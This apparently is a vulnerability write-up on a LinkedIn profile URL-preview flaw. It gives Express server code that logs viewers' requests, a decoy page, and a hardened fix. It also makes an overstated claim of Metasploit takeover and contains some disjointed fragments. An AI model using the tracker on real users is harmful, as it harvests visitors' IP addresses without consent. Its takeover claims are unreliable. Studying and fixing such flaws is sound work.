The vulnerability leads to IP disclosure, which can be used to perform harmful actions such as taking over the user's machine with the Metasploit framework.
- Replace {user-name} with your user name, then go to https://www.linkedin.com/in/{user-name}/edit/topcard/
When com.linkedin.voyager.feed.urlpreview.PreviewImage fails to get preview images, it will use our link as the preview image. For this to happen, you should avoid any image URL in the meta-tags.
- LinkedIn URL preview endpoint: https://www.linkedin.com/voyager/api/feed/urlpreview/{URL}
When adding https://a738b3cb.ngrok.io/user, we got:
- Response:

```json
{
  "data": {
    "$deletedFields": [],
    "value": {
      "com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful"
    },
    "$type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewResponse",
    "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root"
  },
  "included": [
    {
      "$deletedFields": [],
      "data": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful,data",
      "$type": "com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful",
      "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful"
    },
    {
      "urn": "urn:li:article:7726755832606755082",
      "previewImages": [],
      "$deletedFields": [ "description", "update" ],
      "resolvedUrl": "https://a738b3cb.ngrok.io/user",
      "source": "a738b3cb.ngrok.io",
      "id": "urn:li:article:7726755832606755082",
      "type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewResponse",
      "title": "The Rock",
      "url": "https://a738b3cb.ngrok.io/user",
      "$type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewData",
      "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful,data"
    }
  ]
}
```
- If the previewImages key in the response is an empty array, com.linkedin.voyager.feed.urlpreview.PreviewImage will use resolvedUrl as the preview image.
- When a user visits the profile and clicks on "See more", the preview image is loaded directly in the background.
- I added a new header called User-Message (yser-Message) to the request header.
- I might get the header with its contents in the logs.
We've got the flag
It's an express.js application written in Node.js.
| Author | By me |
|---|---|
| Written in | Node.js |
| Dependencies | {"express": "^4.15.3"} |
| Installation | npm install |
| Run | node start |
- We need to check the accept and referer headers to detect whether the request was sent from linkedin.com or not:

```javascript
app.get('/user', function (req, res) {
  // Only an image request that carries a linkedin.com referer gets the image
  if (/image\/(.*)/.test(req.header('accept')) && /linkedin.com/.test(req.header('referer'))) {
    res.sendFile(ourImage);
    storeLogs();
  } else {
    res.sendFile(ourHTMLpage);
  }
  // ...
```
- If accept and referer match, stream the image and store this request payload in log.json.
- Otherwise, send an HTML page without any meta-tags that are used for an image:

```html
<html prefix="og: http://ogp.me/ns#">
  <head>
    <title>The Rock (1996)</title>
    <meta property="og:title" content="The Rock" />
    <meta property="og:type" content="video.movie" />
    <meta property="og:url" content="http://www.imdb.com/title/tt0117500/" />
  </head>
  <body>
  </body>
</html>
```
The full script is in the attachment.
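As an added example (not code from this report or from LinkedIn), the JavaScript below puts the client-side image choice that makes this bug possible beside a hardened version: the vulnerable picker falls back to resolvedUrl when previewImages is empty, so the viewer's browser connects to the submitted host and leaks its IP, while the hardened picker never uses resolvedUrl and routes any image through a server-side proxy. IMAGE_PROXY is an assumed placeholder, the assumption that previewImages holds URL strings is mine, and the sample response is trimmed from the one shown above.

```javascript
// Assumed proxy endpoint (placeholder, not LinkedIn's real path): the server
// fetches the image, so the viewer only ever talks to the platform itself.
const IMAGE_PROXY = 'https://example.invalid/image-proxy?u=';

// Constructed sample, trimmed from the urlpreview response in the report.
// previewImages is empty because our page exposes no image meta-tags.
const sampleResponse = {
  included: [
    { $type: 'com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful' },
    {
      $type: 'com.linkedin.voyager.feed.urlpreview.UrlPreviewData',
      resolvedUrl: 'https://a738b3cb.ngrok.io/user',
      previewImages: [],
      title: 'The Rock',
    },
  ],
};

function previewData(resp) {
  return (resp.included || []).find(
    (e) => e.$type === 'com.linkedin.voyager.feed.urlpreview.UrlPreviewData'
  );
}

// Vulnerable picker: an empty previewImages array turns the submitted URL
// itself into the <img src>, so every viewer's browser hits that host.
function vulnerablePreviewImage(resp) {
  const d = previewData(resp);
  if (!d) return null;
  return d.previewImages.length > 0 ? d.previewImages[0] : d.resolvedUrl;
}

// Hardened picker: no fallback to resolvedUrl (render a text-only card), and
// any candidate (assumed to be a URL string) is validated and then proxied.
function safePreviewImage(resp) {
  const d = previewData(resp);
  if (!d || !Array.isArray(d.previewImages) || d.previewImages.length === 0) {
    return null;
  }
  let parsed;
  try {
    parsed = new URL(d.previewImages[0]);
  } catch (err) {
    return null;
  }
  if (parsed.protocol !== 'https:') return null;
  return IMAGE_PROXY + encodeURIComponent(parsed.href);
}
```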
Since the attacker's profile is publicly accessible, this vulnerability could affect all users on the given domain, because the preview is loaded whenever the attacker's profile is viewed by any other user on the platform. Furthermore, this could be used to perform actions against the victim (or any user visiting that page) and could potentially lead to the user's machine being taken over remotely. This could happen by users navigating to the attacker's profile on their own, or by the attacker somehow persuading the victim to navigate to the profile.
Taking over a user's machine would allow an attacker to perform harmful actions. A great topic about how to target a public IP with Metasploit.
Watch the video at https://youtu.be/DNywwox2Lv8 (don't worry, it's an unlisted video).